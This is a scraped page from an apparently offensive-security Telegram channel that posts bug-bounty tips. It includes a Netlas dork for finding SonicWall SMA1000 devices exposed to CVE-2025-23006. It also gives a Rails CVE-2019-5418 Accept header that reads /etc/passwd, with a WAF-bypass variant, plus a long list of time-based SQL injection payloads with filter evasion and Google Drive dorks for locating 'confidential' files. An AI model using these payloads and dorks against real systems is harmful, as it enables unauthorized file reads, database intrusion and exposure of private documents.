NEW BOT Телеграм, страница

Brut Security

CVE-2025-23006: Deserialization of Untrusted Data in SonicWall SMA1000, 9.8 rating 🔥

A pre-authentication deserialization of untrusted data vulnerability was detected in SMA1000 components, which could allow an attacker to execute OS commands.

Search at Netlas.io:
👉 Link: https://nt.ls/FLFJT
👉 Dork: http.headers.server:"SMA"

Vendor's advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002

🔥5❤3👍3

3.42K views09:03

Brut Security

☄️New IDOR POC- https://news.1rj.ru/str/brutsecurity_poc/13

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥6

3.11K views10:25

Brut Security

🔖always examine the .js files in the source code, for this I can recommend this simple but effective tool github.com/w9w/JSA from here you can access the endpoints of critical data, the places where backup files are stored and many endpoints.

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥12👍8❤5

3.36K views11:16

Brut Security

🔖Submaker - Subdomain Wordlist Generator

⬇️

https://github.com/llMNMll/Submaker

Please open Telegram to view this post

VIEW IN TELEGRAM

❤8👍3

3.27K views12:43

Brut Security

⚠️If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.

Intercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{

🛍If the server is deemed to be vulnerable, but a WAF is present:


../../../../../../e*c/p*s*d{{

✔️Credit- nav1n0x

Please open Telegram to view this post

VIEW IN TELEGRAM

1❤43👍15🔥8🫡4🗿2

3.38K views13:15

Brut Security

⚠️If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found. Intercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{…

Drop Reactions

⚡️

Please open Telegram to view this post

VIEW IN TELEGRAM

❤17👍4🫡4

2.98K views13:31

Brut Security

⚡️

Standoff BB Platform-

https://dopescope.standoff365.com/

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥4🗿3

2.96K viewsedited 16:55

Brut Security

timebased payloads for different dbms:

XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='

❤28👍13

3.25K views18:30

Brut Security

0:06

This media is not supported in your browser

VIEW IN TELEGRAM

For Real Bruh 😭

😭

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥15🐳2🤨2🗿2😁1

3K viewsedited 19:11

Brut Security

🌟One-Liner - Extract all URLs from the Source Code

curl "testphp.vulnweb.com" | grep -oP '(https*://|www\.)[^ ]*'

🔔

@0x0SojalSec

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥24❤3👍3👨‍💻3🫡3

3.49K views19:28

Brut Security

⚠️Google Drive Dorks

site:http://drive.google.com inurl:folder 
site:http://drive.google.com inurl:open 
site:http://docs.google.com inurl:d 
site:http://drive.google.com "confidential" 
site:http://docs.google.com inurl:d filetype:docx

Please open Telegram to view this post

VIEW IN TELEGRAM

👍9🔥7❤2

3.25K views10:39

Brut Security

⚠️Google Drive Dorks site:http://drive.google.com inurl:folder site:http://drive.google.com inurl:open site:http://docs.google.com inurl:d site:http://drive.google.com "confidential" site:http://docs.google.com inurl:d filetype:docx

https://hackerone.com/reports/2926447

HackerOne

U.S. Dept Of Defense disclosed on HackerOne: Public google drive...

**Denoscription:**
I found google drive link `https://drive.google.com/drive/folders/ █████████` at `https:// ████████.aspx?Mode=ReadOnly&Id=90dd0d3b-0ed1-e76b-128f-11ebc799ba55` contains pdfs at...

👍4❤1🫡1

3.22K views10:41